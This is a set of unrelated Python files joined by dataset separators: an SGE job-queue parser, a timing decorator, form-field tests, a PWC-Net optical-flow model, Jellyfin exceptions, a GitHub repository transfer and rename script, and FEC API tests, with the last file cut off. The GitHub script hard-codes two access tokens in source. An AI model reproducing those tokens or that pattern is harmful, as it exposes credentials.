    """Build and execute a qstat command, returning its raw XML output."""
    parts = ["qstat -xml -g dt -u '*'"]
    if full_format:
        parts.append("-f")
    if hostname_filter:
        parts.append("-l hostname={0}".format(hostname_filter))
    if job_state_filter:
        parts.append("-s {0}".format(job_state_filter))
    return check_sge_command_output(" ".join(parts))
def get_compute_nodes_info(hostname_filter=None, job_state_filter=None):
    """Return a {hostname: SgeHost} dict parsed from full-format qstat XML."""
    output = _run_qstat(full_format=True, hostname_filter=hostname_filter, job_state_filter=job_state_filter)
    if not output:
        return {}
    queue_elems = ElementTree.fromstring(output).findall("./queue_info/*")
    parsed_hosts = (SgeHost.from_xml(ElementTree.tostring(elem)) for elem in queue_elems)
    return {host.name: host for host in parsed_hosts}
def get_jobs_info(hostname_filter=None, job_state_filter=None):
    """Return a list of SgeJob objects parsed from qstat XML output."""
    output = _run_qstat(full_format=False, hostname_filter=hostname_filter, job_state_filter=job_state_filter)
    if not output:
        return []
    job_elems = ElementTree.fromstring(output).findall(".//job_list")
    return [SgeJob.from_xml(ElementTree.tostring(elem)) for elem in job_elems]
def get_pending_jobs_info(max_slots_filter=None, skip_if_state=None):
    """
    Retrieve the list of pending jobs.

    :param max_slots_filter: discard jobs that require a number of slots bigger than the given value
    :param skip_if_state: discard jobs that are in the given state
    :return: the list of filtered pending jobs.
    """
    pending_jobs = get_jobs_info(job_state_filter="p")
    if not (max_slots_filter or skip_if_state):
        return pending_jobs
    filtered_jobs = []
    for job in pending_jobs:
        if max_slots_filter and job.slots > max_slots_filter:
            logging.info(
                "Skipping job %s since required slots (%d) exceed max slots (%d)",
                job.number,
                job.slots,
                max_slots_filter,
            )
            continue
        if skip_if_state and skip_if_state in job.state:
            logging.info("Skipping job %s since in state %s", job.number, job.state)
            continue
        filtered_jobs.append(job)
    return filtered_jobs
class SgeJob(ComparableObject):
    """A single job entry parsed from a qstat ``<job_list>`` XML element."""
    # Example element this class is built from:
    # <job_list state="running">
    #     <JB_job_number>89</JB_job_number>
    #     <JAT_prio>0.60500</JAT_prio>
    #     <JB_name>STDIN</JB_name>
    #     <JB_owner>centos</JB_owner>
    #     <state>sr</state>
    #     <JAT_start_time>2019-05-15T13:16:51</JAT_start_time>
    #     <master>SLAVE</master>
    #     <slots>1</slots>
    # </job_list>

    # Maps XML tag -> target attribute (with optional value transformation);
    # consumed by common.schedulers.converters.from_xml_to_obj.
    MAPPINGS = {
        "JB_job_number": {"field": "number"},
        "slots": {"field": "slots", "transformation": int},
        "state": {"field": "state"},
        "master": {"field": "node_type"},
        "tasks": {"field": "array_index", "transformation": lambda x: int(x) if x is not None else None},
        # queue_name looks like "all.q@hostname": keep only the hostname part.
        "queue_name": {"field": "hostname", "transformation": lambda name: name.split("@", 1)[1] if name else None},
    }

    def __init__(self, number=None, slots=0, state="", node_type=None, array_index=None, hostname=None):
        self.number = number
        self.slots = slots
        self.state = state
        self.node_type = node_type
        self.array_index = array_index
        self.hostname = hostname

    @staticmethod
    def from_xml(xml):
        """Build an SgeJob from a ``<job_list>`` XML string."""
        return from_xml_to_obj(xml, SgeJob)
class SgeHost(ComparableObject):
    """A queue-instance entry (one host) parsed from a qstat ``<Queue-List>``
    XML element, including the jobs currently associated with it."""
    # Example element this class is built from (hostnames anonymized in the
    # original source):
    # <Queue-List>
    #     <name><EMAIL>.q@ip-10-0-0-16<EMAIL>-west-1.<EMAIL>.internal</name>
    #     <qtype>BIP</qtype>
    #     <slots_used>2</slots_used>
    #     <slots_resv>0</slots_resv>
    #     <slots_total>4</slots_total>
    #     <load_avg>0.01000</load_avg>
    #     <arch>lx-amd64</arch>
    #     <job_list state="running">
    #         <JB_job_number>89</JB_job_number>
    #         <JAT_prio>0.60500</JAT_prio>
    #         <JB_name>STDIN</JB_name>
    #         <JB_owner>centos</JB_owner>
    #         <state>r</state>
    #         <JAT_start_time>2019-05-15T13:16:51</JAT_start_time>
    #         <master>MASTER</master>
    #         <slots>1</slots>
    #     </job_list>
    #     <job_list state="running">
    #         <JB_job_number>95</JB_job_number>
    #         <JAT_prio>0.60500</JAT_prio>
    #         <JB_name>STDIN</JB_name>
    #         <JB_owner>centos</JB_owner>
    #         <state>s</state>
    #         <JAT_start_time>2019-05-15T13:16:51</JAT_start_time>
    #         <slots>1</slots>
    #     </job_list>
    # </Queue-List>

    # Maps XML tag -> target attribute; nested <job_list> elements are
    # recursively converted into SgeJob instances.
    MAPPINGS = {
        # name looks like "all.q@hostname": keep only the hostname part.
        "name": {"field": "name", "transformation": lambda name: name.split("@", 1)[1] if name else None},
        "slots_used": {"field": "slots_used", "transformation": int},
        "slots_total": {"field": "slots_total", "transformation": int},
        "slots_resv": {"field": "slots_reserved", "transformation": int},
        "state": {"field": "state"},
        "job_list": {
            "field": "jobs",
            "transformation": lambda job: SgeJob.from_xml(ElementTree.tostring(job)),
            "xml_elem_type": "xml",
        },
    }

    def __init__(self, name=None, slots_total=0, slots_used=0, slots_reserved=0, state="", jobs=None):
        self.name = name
        self.slots_total = slots_total
        self.slots_used = slots_used
        self.slots_reserved = slots_reserved
        self.state = state
        self.jobs = jobs or []

    @staticmethod
    def from_xml(xml):
        """Build an SgeHost from a ``<Queue-List>`` XML string."""
        return from_xml_to_obj(xml, SgeHost)
| StarcoderdataPython |
3273056 | import logging
from .get_class_that_defined_method import get_class_that_defined_method
from .now import now
# Module-level logger named after this module.
log = logging.getLogger(__name__)
def time_method(f):
    """Decorator that logs how long each call to *f* takes, in milliseconds.

    The message is emitted at DEBUG level and names the function as
    ``Class::method`` when *f* is defined on a class, else just ``f.__name__``.
    The wrapped function's return value is passed through unchanged.
    """
    from functools import wraps  # local import keeps module-level deps unchanged

    @wraps(f)  # bug fix: preserve __name__/__doc__ of the wrapped function
    def wrap(*args, **kwargs):
        defining_class = get_class_that_defined_method(f)
        if defining_class is not None:
            fn_description = "{0.__name__}::{1.__name__}".format(defining_class, f)
        else:
            fn_description = f.__name__
        time1 = now().timestamp()
        ret = f(*args, **kwargs)
        time2 = now().timestamp()
        log.debug("{0} function took {1:.3f} ms".format(fn_description, (time2 - time1) * 1000.0))
        return ret

    return wrap
| StarcoderdataPython |
170690 | import pytest
import wtforms
from dmutils.forms.fields import DMRadioField
# Fixture data for the radio field under test: each option carries the label
# shown to the user, the submitted value, and a free-text description.
_options = [
    {
        "label": "Yes",
        "value": "yes",
        "description": "A positive response."
    },
    {
        "label": "No",
        "value": "no",
        "description": "A negative response."
    }
]
class RadioForm(wtforms.Form):
    """Minimal form exercising DMRadioField with the module-level options."""
    field = DMRadioField(options=_options)
@pytest.fixture
def form():
    """An unbound RadioForm (no data submitted)."""
    return RadioForm()
@pytest.fixture(params=["yes", "no"])
def form_with_selection(request):
    """(form, value) pairs for each valid radio selection."""
    return (RadioForm(data={"field": request.param}), request.param)
@pytest.fixture(params=["true", "false", "garbage", ""])
def form_with_invalid_selection(request):
    """(form, value) pairs for submissions outside the declared options."""
    return (RadioForm(data={"field": request.param}), request.param)
def test_dm_radio_field_has_options_property(form):
    """The field exposes a truthy ``options`` property."""
    assert form.field.options
def test_options_is_a_list_of_dicts(form):
    """``options`` is a list whose elements are all dicts."""
    assert isinstance(form.field.options, list)
    assert all(isinstance(option, dict) for option in form.field.options)
def test_an_option_can_have_a_description(form):
    """Option dicts may carry a 'description' entry."""
    assert form.field.options[0]['description']
def test_constructor_accepts_choices_parameter():
    """DMRadioField can also be configured with plain wtforms choices."""
    class RadioForm(wtforms.Form):
        field = DMRadioField(choices=[("yes", "Yes"), ("no", "No")])

    form = RadioForm()

    assert form.field.choices
def test_value_is_none_if_there_is_no_selection(form):
    """With no submitted data, ``value`` is None."""
    assert form.field.value is None
def test_value_is_the_selected_radio_button(form_with_selection):
    """``value`` echoes back the submitted selection."""
    form, selection = form_with_selection
    assert form.field.value == selection
def test_validation_succeeds_if_value_is_in_options(form_with_selection):
    """A value from the declared options validates."""
    form, _ = form_with_selection
    assert form.validate()
def test_validation_fails_if_value_is_not_in_options(form_with_invalid_selection):
    """Any value outside the declared options fails validation."""
    form, _ = form_with_invalid_selection
    assert not form.validate()
def test_iter_choices(form):
    """iter_choices yields (value, label, selected) with nothing selected."""
    assert list(form.field.iter_choices()) == [("yes", "Yes", False), ("no", "No", False)]
def test_iter_choices_with_selection():
    """iter_choices marks exactly the submitted option as selected."""
    form = RadioForm(data={"field": "yes"})
    assert list(form.field.iter_choices()) == [("yes", "Yes", True), ("no", "No", False)]

    form = RadioForm(data={"field": "no"})
    assert list(form.field.iter_choices()) == [("yes", "Yes", False), ("no", "No", True)]
| StarcoderdataPython |
26064 | import torch
import torch.nn as nn
import torch.nn.functional as F
from ..decoder import ConvDecoder
from ..encoder import build_encoder
from ..modules import conv, deconv
from ..similarity import CorrelationLayer
from ..utils import warp
from .build import MODEL_REGISTRY
@MODEL_REGISTRY.register()
class PWCNet(nn.Module):
    """
    Implementation of the paper
    `PWC-Net: CNNs for Optical Flow Using Pyramid, Warping, and Cost Volume <https://arxiv.org/abs/1709.02371>`_

    Parameters
    ----------
    cfg : :class:`CfgNode`
        Configuration for the model
    """

    def __init__(self, cfg):
        super(PWCNet, self).__init__()

        self.cfg = cfg
        # Shared feature pyramid extractor applied to both input images.
        self.encoder = build_encoder(cfg.ENCODER)
        self.correlation_layer = CorrelationLayer(
            pad_size=cfg.SIMILARITY.PAD_SIZE,
            max_displacement=cfg.SIMILARITY.MAX_DISPLACEMENT,
        )

        # One cost-volume channel per displacement in the (2d+1)x(2d+1) window.
        search_range = (2 * cfg.SIMILARITY.MAX_DISPLACEMENT + 1) ** 2

        self.decoder_layers = nn.ModuleList()
        decoder_cfg = cfg.DECODER.CONFIG

        self.up_feature_layers = nn.ModuleList()

        for i in range(len(decoder_cfg)):
            if i == 0:
                # Coarsest level: the decoder only sees the cost volume.
                concat_channels = search_range
            else:
                # Finer levels also see pyramid features plus the upsampled
                # flow/features from the previous decoder.
                # NOTE(review): adding MAX_DISPLACEMENT to a channel count
                # looks unusual — confirm this bookkeeping against ConvDecoder.
                concat_channels = (
                    search_range + decoder_cfg[i] + cfg.SIMILARITY.MAX_DISPLACEMENT
                )

            self.decoder_layers.append(
                ConvDecoder(
                    config=decoder_cfg,
                    to_flow=True,
                    concat_channels=concat_channels,
                )
            )

            self.up_feature_layers.append(
                deconv(
                    concat_channels + sum(decoder_cfg),
                    2,
                    kernel_size=4,
                    stride=2,
                    padding=1,
                )
            )

        # One 2-channel flow-upsampling deconv per decoder level.
        self.deconv_layers = nn.ModuleList()
        for i in range(len(decoder_cfg)):
            self.deconv_layers.append(deconv(2, 2, kernel_size=4, stride=2, padding=1))

        # Context network: a stack of (increasingly dilated) convolutions that
        # refines the finest-level flow prediction.
        self.dc_conv = nn.ModuleList(
            [
                conv(
                    search_range
                    + cfg.SIMILARITY.MAX_DISPLACEMENT
                    + decoder_cfg[-1]
                    + sum(decoder_cfg),
                    128,
                    kernel_size=3,
                    stride=1,
                    padding=1,
                    dilation=1,
                ),
            ]
        )
        self.dc_conv.append(
            conv(
                decoder_cfg[0],
                decoder_cfg[0],
                kernel_size=3,
                stride=1,
                padding=2,
                dilation=2,
            )
        )
        # Dilation (and matching padding) doubles at each subsequent layer.
        padding = 4
        dilation = 4
        for i in range(len(decoder_cfg) - 2):
            self.dc_conv.append(
                conv(
                    decoder_cfg[i],
                    decoder_cfg[i + 1],
                    kernel_size=3,
                    stride=1,
                    padding=padding,
                    dilation=dilation,
                )
            )
            padding *= 2
            dilation *= 2
        self.dc_conv.append(
            conv(
                decoder_cfg[3],
                decoder_cfg[4],
                kernel_size=3,
                stride=1,
                padding=1,
                dilation=1,
            )
        )
        self.dc_conv.append(
            nn.Conv2d(32, 2, kernel_size=3, stride=1, padding=1, bias=True)
        )
        self.dc_conv = nn.Sequential(*self.dc_conv)

        self._init_weights()

    def _init_weights(self):
        # Kaiming (fan-in) initialisation for every conv/deconv weight;
        # biases start at zero.
        for m in self.modules():
            if isinstance(m, nn.Conv2d) or isinstance(m, nn.ConvTranspose2d):
                nn.init.kaiming_normal_(m.weight.data, mode="fan_in")
                if m.bias is not None:
                    m.bias.data.zero_()

    def _corr_relu(self, features1, features2):
        # Cost volume between two feature maps, passed through leaky ReLU.
        corr = self.correlation_layer(features1, features2)
        return F.leaky_relu(corr, negative_slope=0.1)

    def forward(self, img1, img2):
        """
        Performs forward pass of the network

        Parameters
        ----------
        img1 : torch.Tensor
            Image to predict flow from
        img2 : torch.Tensor
            Image to predict flow to

        Returns
        -------
        torch.Tensor
            Flow from img1 to img2
        """

        H, W = img1.shape[-2:]

        feature_pyramid1 = self.encoder(img1)
        feature_pyramid2 = self.encoder(img2)

        up_flow, up_features = None, None
        # Scale applied to the upsampled flow before warping; doubled at each
        # finer level. NOTE(review): 0.625 is a magic constant presumably
        # inherited from the PWC-Net reference implementation — confirm.
        up_flow_scale = 0.625

        flow_preds = []

        for i in range(len(self.decoder_layers)):
            if i == 0:
                # Coarsest level: no previous flow available to warp with.
                corr = self._corr_relu(feature_pyramid1[i], feature_pyramid2[i])
                concatenated_features = corr
            else:
                # Warp the second image's features with the upsampled flow,
                # then correlate against the first image's features.
                warped_features = warp(feature_pyramid2[i], up_flow * up_flow_scale)
                up_flow_scale *= 2

                corr = self._corr_relu(feature_pyramid1[i], warped_features)
                concatenated_features = torch.cat(
                    [corr, feature_pyramid1[i], up_flow, up_features], dim=1
                )

            flow, features = self.decoder_layers[i](concatenated_features)
            flow_preds.append(flow)

            up_flow = self.deconv_layers[i](flow)
            up_features = self.up_feature_layers[i](features)

        # Finest prediction first; refine it with the context network applied
        # to the last decoder's features.
        flow_preds.reverse()
        flow_preds[0] += self.dc_conv(features)

        if self.training:
            return flow_preds
        else:
            flow = flow_preds[0]

            if self.cfg.INTERPOLATE_FLOW:
                H_, W_ = flow.shape[-2:]

                flow = F.interpolate(
                    flow, img1.shape[-2:], mode="bilinear", align_corners=True
                )
                # Rescale the flow vectors to match the upsampled resolution.
                flow_u = flow[:, 0, :, :] * (W / W_)
                flow_v = flow[:, 1, :, :] * (H / H_)
                flow = torch.stack([flow_u, flow_v], dim=1)

            if self.cfg.FLOW_SCALE_FACTOR is not None:
                flow *= self.cfg.FLOW_SCALE_FACTOR

            return flow
| StarcoderdataPython |
def demographyStep():
    """Placeholder for a demography step; not yet implemented (no-op)."""
    pass
| StarcoderdataPython |
8021668 | import json
import requests
import sys
from mako.template import Template
def main():
    """Render commands.json through the Mako template given as argv[1] and
    post the rendered markup to the dev.bukkit.org plugin wiki page.

    Usage: script.py TEMPLATE_FILE API_KEY
    """
    # context manager closes the file deterministically (the original
    # open().read() leaked the handle)
    with open('commands.json') as f:
        data = json.load(f)
    text = Template(filename=sys.argv[1]).render(data=data)
    payload = {'markup_type': 'html', 'markup': text, 'comments': 'y'}
    # pass the API key as a query parameter so it is properly URL-encoded
    # instead of string-concatenated into the URL
    requests.post(
        'http://dev.bukkit.org/bukkit-plugins/incorporate/pages/main/edit/',
        params={'api-key': sys.argv[2]},
        data=payload,
    )
if __name__ == '__main__':
main()
| StarcoderdataPython |
3376344 | <filename>mediaServer/exceptions.py
class JellyfinException(Exception):
    """Base class for all errors raised by this Jellyfin client module."""
    pass
class JellyfinBadRequest(JellyfinException):
    # presumably raised for HTTP 400 responses — confirm at raise sites
    pass
class JellyfinUnauthorized(JellyfinException):
    # presumably raised for HTTP 401 responses — confirm at raise sites
    pass
class JellyfinForbidden(JellyfinException):
    # presumably raised for HTTP 403 responses — confirm at raise sites
    pass
class JellyfinResourceNotFound(JellyfinException):
    # presumably raised for HTTP 404 responses — confirm at raise sites
    pass
class JellyfinServerError(JellyfinException):
    # presumably raised for HTTP 5xx responses — confirm at raise sites
    pass
214445 | # -*- coding: utf-8 -*-
import json
import re
import requests
# Access tokens and API roots for the internal GitHub Enterprise instance and
# for public github.com.
# NOTE(review): hard-coded credentials committed to source — these should be
# revoked and loaded from the environment or a secrets store instead.
ACCESS_TOKEN = '7a285e8f48f85958dd04257966be69c6c57e519c'
BASE_URL = 'https://www-github3.cisco.com/api/v3'
PUBLIC_ACCESS_TOKEN = '4d3ad44f6df3447de0e977ad67b04a8787b8e03c'
PUBLIC_BASE_URL = 'https://api.github.com'
def get_session(access_token=None, base_url=None):
    """Return a requests.Session pre-configured with token authentication
    headers and a ``base_url`` attribute used by the other helpers here."""
    session = requests.Session()
    session.headers.update({
        'Authorization': 'token {}'.format(access_token),
        'Accept': 'application/vnd.github.mercy-preview+json',
    })
    session.base_url = base_url
    return session
def parse_links(headers=None):
    """Parse an HTTP ``Link`` header into a ``{rel: url}`` dict.

    Returns None when the header is absent. Whitespace is stripped before
    splitting on commas, matching GitHub's ``<url>; rel="name"`` format;
    malformed entries are silently skipped.
    """
    if 'Link' not in headers:
        return None
    rels = {}
    for part in headers['Link'].replace(' ', '').split(','):
        match = re.match(r'^<(.*)>;rel="(.*)"$', part)
        if match:
            rels[match.group(2)] = match.group(1)
    return rels
def search_repos(session=None, url=None, search_query=None):
    """Return all repositories matching *search_query*, following pagination.

    Either *url* (a fully-formed search URL, used when recursing through
    ``Link: rel="next"`` pages) or *search_query* must be supplied.
    """
    repos = []
    if not url:
        url = "{base_url}/search/repositories?q={search_query}".format(
            base_url=session.base_url, search_query=search_query)
    req = session.get(url)
    if not req.ok:
        # ValueError does not %-format its arguments (unlike logging calls);
        # build the message explicitly
        raise ValueError('Failed search repos repos [%s]. %s' % (url, req.reason))
    data = req.json()
    repos = repos + data['items']
    links = parse_links(req.headers)
    if links and 'next' in links:
        # the "next" URL already encodes the query, so search_query is not re-passed
        repos = repos + search_repos(session=session, url=links['next'])
    return repos
def transfer(session=None, repo=None, new_owner=None):
    """Transfer *repo* (a GitHub API repository dict) to *new_owner*.

    Raises ValueError when the API call fails; prints the HTTP status
    code on success.
    """
    data = {"new_owner": new_owner}
    repo_name = repo['name']
    old_owner = repo['owner']['login']
    url = "{base_url}/repos/{owner}/{repo}/transfer".format(
        base_url=session.base_url, owner=old_owner, repo=repo_name)
    req = session.post(url=url, data=json.dumps(data))
    # print() does not %-format its arguments; interpolate explicitly
    print('Transfering repo %s/%s' % (old_owner, repo_name))
    if not req.ok:
        raise ValueError('Failed to transfer repo %s/%s' % (old_owner, repo_name))
    print(req.status_code)
def rename(session=None, repo=None):
    """Strip the ``gruntwork-`` prefix from *repo*'s name via the GitHub API.

    Repositories whose name does not start with ``gruntwork-`` are skipped.
    Raises ValueError when the PATCH request fails.
    """
    old_name = repo['name']
    owner = repo['owner']['login']
    pattern = r'^gruntwork-(.+)$'
    m = re.match(pattern=pattern, string=old_name)
    if not m:
        # print() does not %-format its arguments; interpolate explicitly
        print("skipping renaming of %s" % old_name)
        return
    new_name = m.groups()[0]
    print('renaming repo %s/%s->%s' % (old_name, owner, new_name))
    url = "{base_url}/repos/{owner}/{repo}".format(base_url=session.base_url, owner=owner, repo=old_name)
    data = {'name': new_name}
    req = session.patch(url=url, data=json.dumps(data))
    if not req.ok:
        # was: referenced undefined names old_owner/repo_name (NameError);
        # use the locals actually defined in this function
        raise ValueError('Failed to rename repo %s/%s' % (owner, old_name))
    print(req.status_code)
def update_collaborations(session=None, owner=None, repo=None, collaborator=None):
    """Grant a team pull access to ``owner/repo``.

    NOTE(review): work in progress — the team id ``109`` is hard-coded into
    the URL, the *collaborator* argument is currently unused, and the
    commented-out URLs below are earlier attempts against other
    collaborator/team endpoints. Confirm the intended endpoint before use.
    """
    # url = "{base_url}/repos/{owner}/{repo}/collaborators/{collaborator}".format(base_url=session.base_url, owner=owner, repo=repo, collaborator=collaborator)
    # url = "{base_url}/orgs/{owner}/teams/{collaborator}/repos/{owner}/{repo}".format(base_url=session.base_url, owner=owner, repo=repo, collaborator=collaborator)
    # url = "{base_url}/orgs/{owner}/teams".format(base_url=session.base_url, owner=owner, repo=repo, collaborator=collaborator)
    url = "{base_url}/teams/109/repos/{owner}/{repo}".format(base_url=session.base_url, owner=owner, repo=repo, collaborator=collaborator)
    # Candidate endpoint templates kept for reference (bare strings, no effect):
    """/orgs/:org/teams"""
    '''/orgs/:org/teams/:team_slug/repos/:owner/:repo'''
    """/orgs/:org/teams/:team_slug/repos/:owner/:repo"""
    """/orgs/:org/teams/:team_slug/repos"""
    """/teams/:team_id/repos/:owner/:repo"""
    params = {'permission': 'pull'}
    print(url)
    # GitHub requires an explicit Content-Length on a bodyless PUT
    session.headers.update({'Content-Length': '0'})
    req = session.put(url=url, params=params)
    # req = session.get(url=url)
    # print(json.dumps(req.json(), indent=4))
    if not req.ok:
        print(req.status_code)
        print(req.reason)
        raise ValueError('Failed to add collaborator repo %s/%s' % (owner, repo))
    #
    print(req.status_code)
"""
'Link': '<https://api.github.com/search/repositories?q=is%3Aprivate+org%3Agruntwork-io&page=2>; rel="next", <https://api.github.com/search/repositories?q=is%3Aprivate+org%3Agruntwork-io&page=2>; rel="last"',
'Link': '<https://api.github.com/search/repositories?q=is%3Aprivate+org%3Agruntwork-io&page=1>; rel="prev", <https://api.github.com/search/repositories?q=is%3Aprivate+org%3Agruntwork-io&page=1>; rel="first"',
"""
def update_branch_protections():
    """Stub: intended to apply branch-protection settings.

    NOTE(review): the payload below mirrors GitHub's "update branch
    protection" request body but is never sent — the function only builds
    the dict and returns None.
    """
    data = {
        "enforce_admins": True,
        "required_pull_request_reviews": {
            "dismissal_restrictions": {
                "teams": [
                    "gruntwork-io"
                ]
            },
            "dismiss_stale_reviews": True,
            "require_code_owner_reviews": True,
            "required_approving_review_count": 1
        },
        "restrictions": {
            "users": [
                "octocat"
            ],
            "teams": [
                "justice-league"
            ],
            "apps": [
                "super-ci"
            ]
        },
        "required_linear_history": True,
        "allow_force_pushes": False,
        "allow_deletions": False
    }
    pass
def go():
    """List all private repositories in the gruntwork-io org on the
    enterprise instance and print the count plus the raw JSON."""
    # NOTE: a previous version first created a public-API session here and
    # immediately overwrote it; that dead call has been removed.
    s = get_session(access_token=ACCESS_TOKEN, base_url=BASE_URL)
    repos = search_repos(session=s, search_query='is:private+org:gruntwork-io')
    print(len(repos))
    print(json.dumps(repos, indent=4))
go()
| StarcoderdataPython |
11318426 | <reponame>dwillis/openFEC<filename>tests/test_itemized.py
import datetime
import sqlalchemy as sa
from tests import factories
from tests.common import ApiBaseTest
from webservices.rest import api
from webservices.schemas import ScheduleASchema
from webservices.schemas import ScheduleBSchema
from webservices.resources.sched_a import ScheduleAView
from webservices.resources.sched_b import ScheduleBView
from webservices.resources.sched_e import ScheduleEView
class TestItemized(ApiBaseTest):
    """Integration tests for the itemized Schedule A/B/E endpoints:
    serialized fields, filtering, sorting, and seek pagination."""

    def test_fields(self):
        """Each itemized view serializes exactly its schema's fields."""
        params = [
            (factories.ScheduleAFactory, ScheduleAView, ScheduleASchema),
            (factories.ScheduleBFactory, ScheduleBView, ScheduleBSchema),
        ]
        for factory, resource, schema in params:
            factory()
            results = self._results(api.url_for(resource))
            self.assertEqual(len(results), 1)
            self.assertEqual(results[0].keys(), schema().fields.keys())

    def test_sorting(self):
        """Sorting by receipt date orders results and exposes last_indexes."""
        receipts = [
            factories.ScheduleAFactory(report_year=2014, contribution_receipt_date=datetime.date(2014, 1, 1)),
            factories.ScheduleAFactory(report_year=2012, contribution_receipt_date=datetime.date(2012, 1, 1)),
            factories.ScheduleAFactory(report_year=1986, contribution_receipt_date=datetime.date(1986, 1, 1)),
        ]
        response = self._response(api.url_for(ScheduleAView, sort='contribution_receipt_date'))
        # NOTE(review): only the 2012/2014 rows are expected back — the 1986
        # row is presumably excluded by the view; confirm against ScheduleAView.
        self.assertEqual(
            [each['report_year'] for each in response['results']],
            [2012, 2014]
        )
        self.assertEqual(
            response['pagination']['last_indexes'],
            {
                'last_index': receipts[0].sched_a_sk,
                'last_contribution_receipt_date': receipts[0].contribution_receipt_date.isoformat(),
            }
        )

    def test_sorting_bad_column(self):
        """Sorting on an unknown column yields a 422 with an explanation."""
        response = self.app.get(api.url_for(ScheduleAView, sort='bad_column'))
        self.assertEqual(response.status_code, 422)
        self.assertIn(b'Cannot sort on value', response.data)

    def test_filter(self):
        """Exact-match filtering on contributor_state."""
        [
            factories.ScheduleAFactory(contributor_state='NY'),
            factories.ScheduleAFactory(contributor_state='CA'),
        ]
        results = self._results(api.url_for(ScheduleAView, contributor_state='CA'))
        self.assertEqual(len(results), 1)
        self.assertEqual(results[0]['contributor_state'], 'CA')

    def test_filter_case_insensitive(self):
        """City filtering ignores case."""
        [
            factories.ScheduleAFactory(contributor_city='NEW YORK'),
            factories.ScheduleAFactory(contributor_city='DES MOINES'),
        ]
        results = self._results(api.url_for(ScheduleAView, contributor_city='new york'))
        self.assertEqual(len(results), 1)
        self.assertEqual(results[0]['contributor_city'], 'NEW YORK')

    def test_filter_fulltext(self):
        """Full-text search on contributor name via the search table."""
        names = ['<NAME>', '<NAME>']
        filings = [
            factories.ScheduleAFactory(contributor_name=name)
            for name in names
        ]
        [
            factories.ScheduleASearchFactory(
                sched_a_sk=filing.sched_a_sk,
                contributor_name_text=sa.func.to_tsvector(name),
            )
            for filing, name in zip(filings, names)
        ]
        results = self._results(api.url_for(ScheduleAView, contributor_name='soros'))
        self.assertEqual(len(results), 1)
        self.assertEqual(results[0]['contributor_name'], '<NAME>')

    def test_filter_fulltext_employer(self):
        """Full-text search on contributor employer."""
        employers = ['Acme Corporation', 'Vandelay Industries']
        filings = [
            factories.ScheduleAFactory(contributor_employer=employer)
            for employer in employers
        ]
        [
            factories.ScheduleASearchFactory(
                sched_a_sk=filing.sched_a_sk,
                contributor_employer_text=sa.func.to_tsvector(employer),
            )
            for filing, employer in zip(filings, employers)
        ]
        results = self._results(api.url_for(ScheduleAView, contributor_employer='vandelay'))
        self.assertEqual(len(results), 1)
        self.assertEqual(results[0]['contributor_employer'], '<NAME>')

    def test_filter_fulltext_occupation(self):
        """Full-text search on contributor occupation."""
        occupations = ['Attorney at Law', 'Doctor of Philosophy']
        filings = [
            factories.ScheduleAFactory(contributor_occupation=occupation)
            for occupation in occupations
        ]
        [
            factories.ScheduleASearchFactory(
                sched_a_sk=filing.sched_a_sk,
                contributor_occupation_text=sa.func.to_tsvector(occupation),
            )
            for filing, occupation in zip(filings, occupations)
        ]
        results = self._results(api.url_for(ScheduleAView, contributor_occupation='doctor'))
        self.assertEqual(len(results), 1)
        self.assertEqual(results[0]['contributor_occupation'], 'Doctor of Philosophy')

    def test_pagination(self):
        """Seek pagination: 20 per page, continued via last_index."""
        filings = [
            factories.ScheduleAFactory()
            for _ in range(30)
        ]
        page1 = self._results(api.url_for(ScheduleAView))
        self.assertEqual(len(page1), 20)
        self.assertEqual(
            [each['sched_a_sk'] for each in page1],
            [each.sched_a_sk for each in filings[:20]],
        )
        page2 = self._results(api.url_for(ScheduleAView, last_index=page1[-1]['sched_a_sk']))
        self.assertEqual(len(page2), 10)
        self.assertEqual(
            [each['sched_a_sk'] for each in page2],
            [each.sched_a_sk for each in filings[20:]],
        )

    def test_pagination_bad_per_page(self):
        """An out-of-range per_page is rejected with a 422."""
        response = self.app.get(api.url_for(ScheduleAView, per_page=999))
        self.assertEqual(response.status_code, 422)

    def test_pdf_url(self):
        """pdf_url is derived from the filing's image number."""
        # TODO(jmcarp) Refactor as parameterized tests
        image_number = 39
        params = [
            (factories.ScheduleAFactory, ScheduleAView),
            (factories.ScheduleBFactory, ScheduleBView),
        ]
        for factory, resource in params:
            factory(image_number=image_number)
            results = self._results(api.url_for(resource))
            self.assertEqual(len(results), 1)
            self.assertEqual(
                results[0]['pdf_url'],
                'http://docquery.fec.gov/cgi-bin/fecimg/?{0}'.format(image_number),
            )

    def test_image_number(self):
        """Exact-match filtering on image_number."""
        image_number = '12345'
        [
            factories.ScheduleAFactory(),
            factories.ScheduleAFactory(image_number=image_number),
        ]
        results = self._results(api.url_for(ScheduleAView, image_number=image_number))
        self.assertEqual(len(results), 1)
        self.assertEqual(results[0]['image_number'], image_number)

    def test_image_number_range(self):
        """min/max image_number filters bound results (string comparison)."""
        [
            factories.ScheduleAFactory(image_number='1'),
            factories.ScheduleAFactory(image_number='2'),
            factories.ScheduleAFactory(image_number='3'),
            factories.ScheduleAFactory(image_number='4'),
        ]
        results = self._results(api.url_for(ScheduleAView, min_image_number='2'))
        self.assertTrue(all(each['image_number'] >= '2' for each in results))
        results = self._results(api.url_for(ScheduleAView, max_image_number='3'))
        self.assertTrue(all(each['image_number'] <= '3' for each in results))
        results = self._results(api.url_for(ScheduleAView, min_image_number='2', max_image_number='3'))
        self.assertTrue(all('2' <= each['image_number'] <= '3' for each in results))

    def test_memoed(self):
        """memoed_subtotal reflects memo_code == 'X'."""
        params = [
            (factories.ScheduleAFactory, ScheduleAView),
            (factories.ScheduleBFactory, ScheduleBView),
        ]
        for factory, resource in params:
            [
                factory(),
                factory(memo_code='X'),
            ]
            results = self._results(api.url_for(resource))
            self.assertFalse(results[0]['memoed_subtotal'])
            self.assertTrue(results[1]['memoed_subtotal'])

    def test_amount_sched_a(self):
        """min/max amount filters on Schedule A receipts."""
        [
            factories.ScheduleAFactory(contribution_receipt_amount=50),
            factories.ScheduleAFactory(contribution_receipt_amount=100),
            factories.ScheduleAFactory(contribution_receipt_amount=150),
            factories.ScheduleAFactory(contribution_receipt_amount=200),
        ]
        results = self._results(api.url_for(ScheduleAView, min_amount=100))
        self.assertTrue(all(each['contribution_receipt_amount'] >= 100 for each in results))
        results = self._results(api.url_for(ScheduleAView, max_amount=150))
        self.assertTrue(all(each['contribution_receipt_amount'] <= 150 for each in results))
        results = self._results(api.url_for(ScheduleAView, min_amount=100, max_amount=150))
        self.assertTrue(all(100 <= each['contribution_receipt_amount'] <= 150 for each in results))

    def test_amount_sched_b(self):
        """min/max amount filters on Schedule B disbursements."""
        [
